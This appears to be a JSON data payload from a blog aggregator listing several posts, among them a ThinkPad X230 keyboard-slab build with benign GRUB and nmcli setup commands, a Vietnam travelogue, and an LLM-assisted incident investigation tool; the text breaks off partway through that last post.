[{"data":1,"prerenderedAt":3359},["ShallowReactive",2],{"planet-meta":3,"planet-doc-pnudupa":3286},{"posts":4,"authors":3269},[5,19,31,42,60,72,87,98,106,113,123,134,141,154,165,172,179,188,195,206,217,229,236,247,254,261,268,275,283,290,297,304,312,323,333,342,353,360,370,379,386,393,403,414,421,428,435,442,449,458,465,472,479,487,494,501,508,515,522,534,541,548,555,562,569,576,583,590,597,604,615,622,629,636,643,650,657,664,671,678,685,692,702,709,716,724,733,740,749,756,763,770,777,784,791,798,805,812,822,829,838,845,853,860,867,874,881,889,896,903,910,917,924,933,940,947,954,961,968,975,986,993,1000,1007,1014,1021,1028,1035,1042,1049,1057,1065,1072,1079,1086,1094,1101,1109,1116,1123,1130,1137,1145,1152,1160,1168,1175,1182,1189,1196,1203,1210,1217,1224,1234,1241,1248,1255,1262,1269,1276,1283,1290,1297,1304,1311,1317,1324,1331,1339,1347,1354,1361,1369,1376,1383,1390,1398,1406,1413,1420,1432,1439,1446,1453,1460,1467,1474,1481,1488,1495,1502,1509,1516,1523,1530,1537,1544,1551,1558,1565,1572,1579,1586,1593,1600,1607,1614,1622,1632,1642,1649,1656,1663,1670,1677,1684,1691,1698,1705,1712,1720,1727,1734,1742,1749,1756,1763,1770,1778,1789,1795,1801,1808,1815,1822,1829,1836,1842,1849,1856,1863,1870,1877,1884,1890,1897,1904,1911,1918,1925,1933,1940,1947,1954,1961,1968,1975,1982,1989,1996,2003,2010,2017,2024,2031,2038,2045,2052,2059,2065,2072,2079,2086,2093,2100,2107,2114,2121,2128,2135,2142,2149,2156,2163,2170,2177,2184,2191,2201,2208,2215,2222,2229,2236,2244,2255,2262,2269,2276,2283,2290,2297,2304,2311,2318,2324,2331,2338,2345,2352,2359,2366,2373,2380,2387,2394,2401,2408,2415,2422,2429,2436,2443,2450,2460,2472,2479,2486,2493,2500,2507,2514,2521,2528,2535,2542,2549,2556,2562,2569,2576,2583,2590,2597,2604,2611,2618,2625,2632,2639,2646,2653,2660,2667,2674,2681,2688,2695,2702,2709,2716,2723,2730,2737,2744,2751,2758,2765,2772,2779,2786,2793,2800,2807,2814,2821,2828,2835,2842,2849,2856,2863,2870,2877,2884,2891,2898,2905,2912,2919,2926,2933,2940,2947,2954,2961,2968,2975,2982,2989,2996,3003,3010,3017,3024,3031,3038,3045,3052,3059,3066,3073,3080,3087,3094,3101,3108,3115,3122,3129,3136,3143,3150,3157,3164,3171,3178,3185,3192,3199,3206,3213,3220,3227,3234,3241,3248,3255,3262],{"slug":6,"title":7,"link":8,"pubDate":9,"contentSnippet":10,"tags":11,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"age-verification","Age Verification Laws: Is This the End of Privacy for Linux and Beyond?","https:\u002F\u002Fibcomputing.com\u002Fage-verification\u002F","Wed, 25 Mar 2026 15:52:03 +0000","The digital landscape is currently undergoing a massive shift as new legislation worldwide begins to target the foundation of our computing experience: the operating system. … \nThe post Age Verification Laws: Is This the End of Privacy for Linux and Beyond? 
appeared first on IB Computing.",[12,13,14],"GNU\u002FLinux","News","systemd","Mujeeb Rahman K","mujeebcpy","\u002Fimages\u002Fmujeebcpy_photo.jpg","https:\u002F\u002Fibcomputing.com\u002Ffeed",{"slug":20,"title":21,"link":22,"pubDate":23,"contentSnippet":24,"tags":25,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"09-x230-slab-html","Turning my ThinkPad X230 into an overpowered keyboardSlab","https:\u002F\u002Faryak.me\u002Fblog\u002F09-x230-slab.html","Mon, 23 Mar 2026 12:39:45 +0000","I removed the screen from my laptop—and it’s now more useful than before.\nAnyways, I recently got my hands on a used ThinkPad X230 for around $60.\nThe machine is great, the keyboard even better, but the TN panel is genuinely unusable.\nFor a while, I used it as a laptop, as intended, but I can only do so much with a TN panel whose max brightness is 10% of my Pixel’s.\nInstead, I decided to cut my losses, remove the display altogether, and use the ThinkPad as a keyboard with my monitor.\nThe Hardware\nDoing this was pretty simple: I just had to open up the back of the laptop, remove the hinge screws, and then slowly disconnect all the wires before removing the display assembly.\nAdditionally, I changed the Wi-Fi card to an Atheros one for good measure. (God bless Libreboot)\nThe main issue was that the ThinkLight is literally impossible to remove from the casing, so I kinda had to snap that wire out.\nI also removed the two Wi-Fi antennae that are glued to the display casing, and kept them outside so Wi-Fi continues to work properly.\nI kept the webcam too, removed from the case and double-taped to my monitor - since somehow this ancient laptop seems to have a better camera than my modern laptop.\nAfter doing all this, and very safely electrical-taping all the extra wires in case I ever decide to put a new display on this, I got a think-slab :D\nAfter shot of my setup\n\nHowever, I had to add a few cmdline arguments on grub to make it work.\n\u002Fetc\u002Fdefault\u002Fgrub:\n\nGRUB_CMDLINE_LINUX_DEFAULT=\"quiet iomem=relaxed i915.modeset=1 video=LVDS-1:d video=VGA-1:e\"\n\nThe first 3 are common grub parameters that you always have, while the last 2 are the special ones you need to add: the :d parameter disables LVDS-1 (the internal display), and the :e parameter enables VGA-1 (in my case, the external display).\nAn update-grub later, everything magically started appearing on my monitor!
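\nBy the way, if you’re not sure what the connectors are actually called on your machine (the names come from the i915 driver, not from grub), a quick sanity check before editing the config is:\n\nfor c in \u002Fsys\u002Fclass\u002Fdrm\u002Fcard*-*\u002Fstatus; do echo \"$c: $(cat \"$c\")\"; done\n\nEach connector (LVDS-1, VGA-1, HDMI-A-1, and so on) reports connected or disconnected, so you can confirm the exact names to use in the video= arguments.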
\nThe software\nThis worked great for research and other random stuff I did, but a laptop from 2012 can only do so much in terms of computing.\nTo remedy this, I decided to just use the ThinkPad keyboard with my modern laptop over software KVM. Since my monitor has both VGA and HDMI, I was able to connect my modern laptop to the HDMI port, and the ThinkPad to VGA.\nThough I was planning on just using Barrier like I did years ago, I decided to go with Lan-Mouse this time.\nIt is a Rust-based application similar to Synergy and Barrier, but with a proper GTK UI and supposedly better performance.\nNow, since I have a wireless card that’s older than me on the ThinkPad, I had to do some ethernet magic for Lan-Mouse if I wanted any sort of real performance. Software KVM is a high-bandwidth task after all.\nSo I connected an ethernet cable between the two laptops, and set it up as follows:\n# On modern laptop\nnmcli con add type ethernet ifname enp2s0 ip4 192.168.50.1\u002F24\n# On ThinkPad\nnmcli con add type ethernet ifname eno0 ip4 192.168.50.2\u002F24\n\nAnd magically, I have a gigabit connection between the two laptops for Lan-Mouse to work through. Lan-Mouse is pretty intuitive to set up, so I’m not covering it here.\nIn conclusion, this one day’s work turned out pretty well for me. I now have a speedy “slabtop” for any research or minor work, and it doesn’t even take 5 minutes for this setup to convert into a high-performance workstation.\nI’m still using the X230 without Lan-Mouse for home usage, when I’m too lazy to get my laptop out of my bag, but this setup really helps when I need to get some real programming work done, which is 10x harder without a keyboard as comfy as the X230’s.",[26],"2026\u002F03\u002F23\u002F1","Arya K.","aryak","\u002Fimages\u002Faryak_photo.png","https:\u002F\u002Faryak.me\u002Frss.xml",{"slug":32,"title":33,"link":34,"pubDate":35,"contentSnippet":36,"tags":37,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"vietnam-trip","Vietnam Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fvietnam-trip\u002F","Sun, 22 Mar 2026 01:00:37 +0530","Before reaching Vietnam\nContinuing from the last post, Badri and I took a flight from Brunei International Airport to Kuala Lumpur on the 12th of December 2024. We reached Kuala Lumpur in the evening.\nAfter arriving at the airport, we went through immigration. In a previous post, I mentioned that we had put our stuff in lockers at the TBS bus terminal in Kuala Lumpur. Therefore, we had to go there.\nThe locker was automated and required us to enter the PIN we had set. Upon entering the PIN, the locker wasn’t getting unlocked. After trying for 10-15 minutes without any luck, we went looking for help, as the lockers weren’t under any supervision.\nSo, I roamed around, found a staff member, and reported that our locker wasn’t unlocking. They called the person in charge of the lockers. He came to us in a few minutes and used his admin access to open the locker. We were supposed to pay for the lockers by putting banknotes in through a slot. However, as the machine wasn’t working, we paid that person for the locker service instead.\nWe soon went back to the KL airport to catch our morning flight to Ho Chi Minh City in Vietnam. At the flight counter, we were afraid we would have to pay extra as our luggage surpassed the allowed weight limit. This one was also a budget airline—AirAsia—and our tickets didn’t include a check-in bag.\nGenerally, passengers from countries requiring a visa to visit Vietnam (such as India) have to go to the airline counter and show their visa to get a boarding pass. However, when we went to the AirAsia counter at the Kuala Lumpur airport, they didn’t weigh our bags and asked us to get our boarding passes from an automated kiosk. So, we got our boarding passes printed and proceeded to airport security.\nWhile clearing security, a lotion I had bought in Singapore was confiscated because it was 200 mL, exceeding the limit of 100 mL per bottle. Had that 200 mL of liquid been in two bottles of 100 mL each, I would have been allowed to take it in my carry-on bag, but a single 200 mL bottle wasn’t! 
I was allowed to keep it in a check-in bag, but my ticket didn’t include one. Huh, airports and their weird rules :( The lotion was an expensive one, so having it thrown away did ruin my mood.\nOverview\nWe started our Vietnam trip from Ho Chi Minh City in the south on the 13th of December 2024 and finished it in Hanoi in the north on the 20th of December. We traveled from Ho Chi Minh City to Hanoi in chunks, mostly by train, except for a hundred or so kilometers by bus. On the way, we visited Nha Trang, Hoi An, and Hue. The distance between Ho Chi Minh City and Hanoi is 1700 km.\nFor your reference, here are those places labeled on Vietnam’s map.\n\nA map of Vietnam with the places we went to labeled. ©CARTO ©MAPTILER ©OPENSTREETMAP\nHo Chi Minh City\nWe landed in Ho Chi Minh City early in the morning on the 13th of December 2024. I was tired and sleepy as I hadn’t gotten a good night’s sleep. After going through immigration, we went to a currency exchange counter to get Vietnamese dong. Unlike in the other countries on this trip, money exchange counters in Vietnam didn’t accept Indian rupees. Therefore, we exchanged euros to get Vietnamese dong at the airport.\nAfter getting out of the airport, we took a bus to the city center. It was 15,000 dong—approximately 50 Indian rupees. Our plan was to meet Badri’s friend and stay the night at his apartment.\nSo we went to a café nearby and bought a coffee for each of us for 75,000 dong. We went upstairs and sat for a while. The Wi-Fi password was mentioned on our bill. During the trip, I found out about the café culture of Vietnam. They have their own coffee brands (such as Highlands Coffee), and you can sit down at any of the cafés to work or to wait for the rain to stop. It rained a lot while we were there, so we did use these cafés for that purpose.\nBadri’s friend met us there, and we roamed around the area a bit, which included roaming inside a beautiful park. Then Badri’s friend took us to a restaurant. Because I do not eat meat, he took us to a vegan restaurant. Having been to four Southeast Asian countries at this point (excluding Vietnam), I was under the impression that there wouldn’t be a lot of options for my diet in Vietnam.\n\nA picture of the park we roamed around in Ho Chi Minh City. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHowever, I was pleasantly surprised at the restaurant. I found all the dishes to be tasty, especially their signature noodles called pho. I liked another dish so much that I later tracked down the restaurant with Badri, using the geotagged image of the bill I had taken earlier, to have it again. As a tip for vegans coming to Vietnam, the places with the word “Chay” (without any accented letters) in their name are vegan-only.\n\nThis is the restaurant Badri’s friend took us to. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nOne of the dishes we had in the restaurant. This one was especially tasty. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nOne of the dishes we had in the restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nThese noodles are called pho and are very popular in Vietnam. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nAt night, we went to a supermarket where I got myself some oranges and guavas. Then, we went to a Japanese restaurant where I didn’t have anything, as there was no vegetarian option for me. Then we took a free bus to Badri’s friend’s apartment. 
The construction company that built the apartment also runs this free bus service from their residential area to different parts of the city as a way of promoting their apartments. Anyone can take the bus, not just residents.\nThe next day, we took the free bus back to the city center and checked in to a hostel for a night. We took two beds in a dormitory, at 88,000 dong (270 rupees) per bed for a night. In Vietnam, if you can spend around 300 rupees per night, you can get a bed in a decent hostel.\nTrain from Ho Chi Minh City to Nha Trang\nOn the night of the 15th of December 2024, we boarded a train from Ho Chi Minh City to Nha Trang. The ticket for each of us was 519,000 dong (1600 Indian rupees). The train name was SNT2. When we reached the Ho Chi Minh City train station, we noticed that the station was rather small by Indian standards.\nAfter entering the train station, we went through to the first platform, where the tickets were checked by a staff member. Ho Chi Minh City was the originating station for our train, so our train was already standing at the station. We had to cross the railway tracks on foot to reach the platform our train was on. Then we located our coach, where a ticket inspector was standing at the gate. He let us in after checking our tickets. In all these instances, we just had to show the digital boarding pass we had received by email.\nUnlike Indian trains, this train didn’t have side berths. Additionally, I liked the fact that it had a dedicated space to put our bags in, which was very convenient. The train departed from Ho Chi Minh City at 21:05 and arrived in Nha Trang at 05:30 in the morning.\n\nInterior of our train coach. Trains in Vietnam don’t have side berths, unlike in India. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nA picture of the berths in our coach. It had three tiers, similar to a 3 AC coach in Indian trains. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nThe train had a cabin to put the bags in. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nNha Trang train station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNha Trang\nNha Trang is a coastal place, and we planned to go to a beach. We figured out that the airport bus could drop us near the beach. Therefore, we went to the bus station to catch the airport bus. The bus station was within walking distance of the railway station, so we decided to walk.\nOn the way, we stopped at a small shop for a coffee. The shop also gave a complimentary cup of green tea along with the coffee. I found out later that it is common for local shops in Vietnam to give a complimentary cup of green tea.\n\nI got a complimentary cup of green tea along with coffee in Nha Trang. On this trip, Badri and I found out that this is customary at local places in Vietnam. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nSoon we reached the bus station and took a bus to the beach. It was 65,000 dong (₹200). After getting down from the bus, I had coconut water and some eggs at a small local place.\n\nEggs being cooked on a pan for my order. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThen we went to the beach, but nobody else was there. We spent some time there and went back to the place where the bus had dropped us, as it started raining. We couldn’t find a bus for some time. A taxi driver approached us and agreed to take us to the city center for 200,000 dong (₹650). 
For reference, the place where he dropped us was 35 km from the place we took the taxi. Taxi fares in Vietnam were also cheap!\n\nThe beach we went to in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNha Trang was a beautiful place, and so we roamed around for a while. Then we stopped at a Highlands Coffee branch. Since Christmas was coming up, the café had a Christmas tree, and I liked the Christmas vibes. They were playing Mariah Carey’s All I Want for Christmas Is You.\n\nThis one was shot in the city center. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nInside a Highlands Coffee cafe in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nA coffee I got from Highlands Coffee in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nDuring the evening, we went to a local place to eat. The place had “Chay” in its name, and you know what that means—it was a vegan place. There was a man there and no other customers. I don’t remember the names of the dishes we ordered, but it was a bowl of soupy noodles and a bowl of dry noodles. They were very tasty. To top that off, the meal was a total of 55,000 dong (₹180) for both of us.\nThe host was welcoming and friendly, and we had a nice conversation with him. In Vietnam, restaurants give you chopsticks to eat noodles with. While Badri was good at using them, I wasn’t. So, the host of this restaurant helped me with using chopsticks. Although my technique was not perfect and I took a bit of time, I could now eat solely with chopsticks.\n\nThe restaurant we went to in Nha Trang. The word Chay in the name means it was a vegan restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nSoupy noodles we got at that restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nDry noodles we got at that restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nOur plan was to take a night bus to Hoi An, and we were hoping to find a bus stand. However, we couldn’t find one. Asking around about the pickup location of the Hoi An bus led us to many different locations. Finally, we ended up at a bus booking agency’s office, where we found out that there were no tickets available for Hoi An.\nAt this point, we gave up on booking the bus and searched for trains instead. As we didn’t have a local SIM, we asked the agency to let us connect to their Wi-Fi so that we could look for trains. They were kind enough to let us do that, even though it seemed like they were going to close the office in about 10 minutes.\nUnfortunately, all the sleeper berths from Nha Trang to Hoi An were booked on the next train, with only seats available. The journey takes around 10 hours, so I wasn’t comfortable traveling seated.\nHere I came up with the idea of looking for sleeper berths from an intermediate stop. Fortunately, there were sleeper berths available from the next stop, Ninh Hòa. Therefore, we booked a seat from Nha Trang to Ninh Hòa and a sleeper berth from Ninh Hòa to Trà Kiệu (the nearest railway station to Hoi An). The train name was SE6, and it was a total of 500,000 dong per person (₹1600 per person).\nSo, we went to the Nha Trang railway station and boarded the train. We had to spend 40 minutes seated, until the train reached the next stop, before we could move to our sleeper berths. 
Badri had some friendly co-passengers on that trip who gave him Saigon beer and some crispy papad-like thing. They offered me some as well, but I thought it was non-veg, so I declined.\nHoi An\nOn the morning of the 17th of December 2024, we got down at the Trà Kiệu station at around 09:30. Our hostel was in Hoi An, which was around 22 km from the station. There was no public transport to get there.\nThere was, however, a taxi driver at the train platform. We told him the name of our hostel, and he quoted 270,000 dong (around ₹850). We said it was too expensive for us, so he came down to 250,000 dong. At this point, we told him that we could give him no more than 200,000 dong, but he didn’t agree.\nBadri tried a trick. He asked the driver to show us prices in the Grab app (a popular taxi booking app in Southeast Asia). Unfortunately, the Grab app showed 258,000 dong, which was more than the fare the driver had agreed to.\nSo we walked away as if we had plenty of options to reach the hostel (we didn’t!). We got out of the station and stopped at a small shop outside to have some coffee. As is customary in Vietnam, we got a complimentary green tea here as well.\n\nThis was the place we had our coffee in Tra Kieu. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThat taxi driver also joined us and sat in the shop. He started talking with the locals in the shop in the local language. The taxi driver was insistent on taking us to Hoi An for 250,000 dong. At this point, Badri told the taxi driver (using translation software) that we usually use public transport during our trips and aren’t used to paying high prices to get around, so he could drop us anywhere in Hoi An for 200,000 dong, as we didn’t mind walking a bit to reach our hostel.\nAfter reading this, the taxi driver agreed to take us to our hostel for 200,000 dong (₹660). He also had me take a picture of him with Badri after this. I think such a bargaining tactic would not work in India.\n\nPhoto of Badri with the taxi driver. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nA nice thing we noticed in Vietnam: once the bargaining is done and the deal is settled, people don’t try to bargain more or keep talking about the subject. Before the deal, the driver was somewhat insistent and argumentative, but after the deal was done, it was as if no argument had happened at all.\n\nA picture of the Tra Kieu area near the train station we got down at. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe were treated to some beautiful scenery on the way to our hostel. Soon we reached our place and completed all the check-in formalities. While our room was being prepared, we had an egg sandwich with coffee in the hotel. I found the egg sandwich very tasty. The bread looked like a French baguette. The hostel was ₹240 per night for each of us.\nThe name of the hostel was Bana Spa. We liked staying there, and we can recommend it if you find yourself in Hoi An. It is operated by a family.\n\nOur breakfast in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nA photo of the hostel we stayed at in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe also rented a bicycle for each of us—25,000 dong per day (₹80)—and explored the old town during the evening. Hoi An is popular for Vietnamese silk. Tourists come here to buy fabric and get it tailored. 
The buildings here looked old, and they were painted yellow with gabled roofs.\n\nA typical yellow house with a gabled roof in Hoi An old town. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHere, I also had egg coffee for the first time, and I liked it. Egg coffee is a delicacy of Hanoi, but you can get it in other parts of Vietnam. If you find yourself in Vietnam, then I recommend you try egg coffee. We also bought some cool T-shirts and other souvenirs, such as a Vietnamese hat, from here.\n\nEgg coffee I had in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHue\nThe next day—the 18th of December 2024—we went to Hue by bus. As we could not take a bus on our own in Nha Trang, we asked the hostel to book it for us this time. We booked it the day before, and they told us to be ready by 07:00 in the morning. At 07:00, a minibus arrived, which took us to a bus agency’s office. There we waited for a few minutes and got into the bus to Hue.\nThe bus had sleeper seats, so I took the opportunity to catch some sleep. The ride was comfortable, so I am assuming the roads were good. In a couple of hours, we reached Hue. Again, we went to Highlands Coffee to have some coffee, charge our phones, and use the internet, not to mention the bathrooms.\nDuring the afternoon, we went to a local restaurant named Quán Chay Thanh Liễu. It was a vegan restaurant (remember the thing I mentioned earlier about “Chay” being in the name?). On the way, we had banh bao, a steamed dumpling shaped like a momo, from a street vendor. It wasn’t very good, but I found it worth trying.\n\nBanh bao in Hue. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nAt the restaurant, we ordered a hot pot. First, they brought noodles and a gas stove. Then came the stock, and our gas stove was turned on. The stock was kept simmering on the stove. Then, we had it bit by bit with the noodles. A big hot pot at this place cost 50,000 dong (₹170). Then we had bánh cuốn. These were steamed rolls made of rice flour, for 10,000 dong (₹33).\n\nHot pot. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nAdded soup to the noodles. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nSteamed rolls made of rice flour. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nRestaurants in Vietnam usually include photos of the dishes on their menus or write a description in English. So, even though the dish names were Vietnamese, we had no problems ordering food there. In addition, all the places we went to provided free Wi-Fi. They either mention the Wi-Fi password on the bill or the menu, or paste it on the wall. This let us get through the trip smoothly without a local SIM.\n\nA menu from a restaurant in Ho Chi Minh City with detailed descriptions of the food. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe had booked the train SE20 to Hanoi, which had a departure time of 20:41 from Hue. This one was 948,000 dong (₹3100) for me and 870,000 dong (₹2900) for Badri. My ticket was pricier than Badri’s because I got a lower berth. Our train was late by half an hour, so we waited in the common area of the station. After the train arrived, we got inside and took our seats.\nThe cabin had four berths—two upper and two lower—similar to India’s First AC class. The ticket inspector came to us and offered us the whole cabin (two additional berths) for 300,000 dong (₹1,000), which we declined. However, this hinted that the other two berths were not reserved. 
Eventually, we had the whole cabin to ourselves, as nobody else showed up for the other two berths. It was a 14-hour journey, and I slept well.\n\nOur berths in the train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHanoi\nOn the morning of the 19th of December 2024, we reached Vietnam’s capital, Hanoi. We had booked a private hotel room for ₹800. It was 1 km from the Hanoi airport but pretty far from the railway station. So, we roamed around in the city and went to the hotel in the evening.\nFirst, we walked to a place and had egg coffee with egg sandwiches. Then we went to Hanoi Train Street, which was within walking distance of the train station. After clicking some pictures at the train street, we went to a museum nearby. Upon reaching it, we found out that it was closed.\n\nEgg coffee in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nHanoi Train Street is a tourist attraction in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThen we went shopping for jackets: Hanoi was cold compared to the other parts of Vietnam we had been to, and since many jackets are manufactured in Vietnam, we thought they would be cheaper. I liked some jackets, but they were not my size. Eventually, we didn’t buy anything at the clothes shop.\nIn the evening, I bought a Vietnamese-style phin coffee filter and coffee powder from Highlands Coffee. We spent a lot of time in their cafés, so it made sense to buy some souvenirs from there. Badri bought a few coffee filters for his family at Trung Nguyen, where I also bought another filter.\nWe had dinner at a local place where we had pho and banh it. Banh it is made of sticky rice and was served wrapped in banana leaves.\n\nA picture of pho we had in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nBanh it is served wrapped in banana leaves. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\nBanh it. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNext, we went to the Hanoi railway station to catch a bus to the airport, since our hotel was 1 km from the airport. The locals there helped us find the bus. It took like an hour to get to the airport. We saw on OpenStreetMap that we could take a bus from there to the hotel, but we could not find it. So we walked to our hotel instead.\nIt was a decent hotel room for ₹800 for a night. We went outside to explore the area and had egg sandwiches and egg coffee at a local place. Again, we were given complimentary green tea. We went to this place like three times; we had practically become regulars by the time we left.\nThe next day—the 20th of December 2024—we took a bus to the airport and boarded our flight to Delhi.\nCredits: Thanks to Badri, Kishy and Richard for proofreading.",[],"Ravi Dwivedi","ravidwivedi","\u002Fimages\u002Fravidwivedi_photo.jpg","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Findex.xml",{"slug":43,"title":44,"link":45,"pubDate":46,"contentSnippet":47,"tags":48,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html","Side-stepping the Secretary Problem, unwittingly.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fside-step-secretary-problem-hiring\u002Findex.html","Fri, 20 Mar 2026 00:00:00 +0000","Having played both parts in the kabuki play that is employee-employer matchmaking, I feel the way we play it is a zero-sum game. I wish it were not so. 
When this post started life in 2024, as a wall-of-text chat message, it was brutal out there, on both sides of the software industry interview table. The ZIRP had ended. As of 2026, post-ZIRP reality has properly set in and remains bad (\"AI\" is a Fig Leaf (Enterprise Edition) for structural damage they self-inflicted, and if you look at Hyperscaler GPU depreciation schedules, they are making it an order of magnitude worse). Against that backdrop, here is a hopefully hopeful hiring anecdote where I think we avoided the so-called \"Secretary Problem\", framed within Optimal Stopping Theory. It can be done. Non-zero-sum hiring ought to be default-mode for any industry, AI or no AI.",[49,50,51,52,53,54,55],"riff","organisation_design","hiring","clojure","culture","whyto","meta","Aditya Athalye","adityaathalye","\u002Fimages\u002Fadityaathalye_photo.jpg","https:\u002F\u002Fwww.evalapply.org\u002Findex.xml",{"slug":61,"title":62,"link":63,"pubDate":64,"contentSnippet":65,"tags":66,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"quote-born-from-story","A Poem Born from a Story","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F03\u002F16\u002Fquote-born-from-story\u002F","Mon, 16 Mar 2026 18:49:55 +0000","Wanting, wanting, I keep wishing 🙏 for victories,\nwhile failures tell me ‘enough, enough’.\nBack then, I rejoiced even at small wins;\nthree a day... will I get them? Let’s try and see 💪\nUnending love, daily clashes from too much affection;\nthe moment I say ‘enough of it all’, a little love blooms again.\nThe sulking never ends, the anger never cools;\nI am trying to stay calm! Not that doubts don’t arise.\nHaving come to see that moon-like face, I wander in search of peace;\nsowing the seed, I wonder whether the tree will flourish.\nDoing what I love, I get utterly carried away,\nand as I go to finish the story, a poem begins -- […]",[67],"raw-quotes","Hariharan Umapathi","hariharanumapathi","\u002Fimages\u002Fhariharanumapathi_photo.png","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002Ffeed\u002F",{"slug":73,"title":74,"link":75,"pubDate":76,"contentSnippet":77,"tags":78,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"event-driven-architecture-in-algo-trading-platform-3a2957ff11a6","Event Driven Architecture in Algo Trading Platform","https:\u002F\u002Fopenalgo.medium.com\u002Fevent-driven-architecture-in-algo-trading-platform-3a2957ff11a6?source=rss-cda86e929c3------2","Sun, 15 Mar 2026 14:30:33 GMT","",[79,80,81,82,83],"event-driven-architecture","algorithmic-trading","openalgo","python","open-source","Rajandran R","marketcalls","https:\u002F\u002Fmedium.com\u002Ffeed\u002F@openalgo",{"slug":88,"title":89,"link":90,"pubDate":91,"contentSnippet":92,"tags":93,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"pi-sre-mode","Building an LLM-Assisted Incident Investigation Tool","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fpi-sre-mode\u002F","2026-03-12T00:00:00.000Z","When you are debugging a production incident, you are forming hypotheses, testing them against evidence, ruling things out, trying not to confuse correlation with causation, and making triage calls under time pressure. The hard part is the reasoning – figuring out why the system is misbehaving, deciding what to stabilize first, knowing when to stop chasing a red herring.\nBut a surprising amount of the time is not spent reasoning. 
It is spent gathering evidence.\nYou are flipping between your metrics dashboard, log viewer, scheduler, cloud console, SSH sessions, deployment history, and a half-written scratchpad. You are trying to answer questions that are conceptually simple but operationally expensive:\nWhat changed in the last hour?\nDid the error spike start before or after the deploy?\nIs this one sick node or a fleet-wide regression?\nDid the autoscaling event line up with the HAProxy alert?\nAre we looking at cause, effect, or a noisy side symptom?\nEach question requires pulling data from a different tool, in a different format, often with timestamps in different timezones. Then you stitch them into a timeline before you can even begin hypothesizing.\nThat evidence-gathering phase is where LLMs turned out to be useful for me. Not because they “solve incidents” – the hypothesis formation, the triage, the mitigation calls stay human. But an LLM with access to the right CLIs can chew through the data-gathering faster than I can by hand.\nI took the system I’d been building internally and rebuilt it as a package for Pi – a minimal, extensible terminal coding agent – called pi-sre-mode. This post is about the journey from a custom agent platform to a thin extension, and why the value turned out to live in content, not code.\nThe Predecessor: llmduck\nBefore pi-sre-mode, I had a system called llmduck. It went through several rewrites – first in Go, then partially in Rust, and finally as a full TypeScript web application with a server (LLM orchestration, session persistence, WebSocket dispatch), a remote agent (command execution on production hosts with policy enforcement), and a React frontend with a split-panel investigation UI.\nThe agent had one tool: bash. All infrastructure interaction happened through CLIs – metrics, logs, scheduler state, cloud APIs, SSH. The LLM decided what to run, the agent executed it, and the server tracked the conversation. An SRE methodology skill guided the model through a structured investigation loop: triage, scope, gather evidence across metrics\u002Flogs\u002Fscheduling, correlate, conclude.\nIt worked. Give the model good operational guidance and read-only access to the right CLIs, and it can do a lot of the mechanical data gathering that normally burns 20-40 minutes during an incident. It can compare scheduler restarts with metric trends. It can correlate a failing backend with a cloud autoscaling event. It can notice that one host is missing metrics entirely and that the “healthy” cluster is only healthy because the remaining nodes are absorbing the load.\nBut the runtime was increasingly the wrong abstraction.\nI had a custom server, a custom agent, a custom frontend, custom registries for skills and templates, custom session persistence, and a CI pipeline to build and deploy it all. The upstream\u002Fwrapper two-repo design – where the generic product lived on GitHub and the org-specific overlay was rsynced into it during build – still meant I was maintaining a bespoke investigation platform.\nThe more I worked on it, the more obvious it became: the content was the product. The runtime was plumbing.\nThe skills, the prompts, the methodology, the failure pattern library, the runbooks, the templates – that was where the value lived. Everything else was infrastructure I was maintaining just to get those skills into an LLM session.\nWhy Pi\nI did not want another chat app. I wanted the investigation to live where I already work: in the terminal, 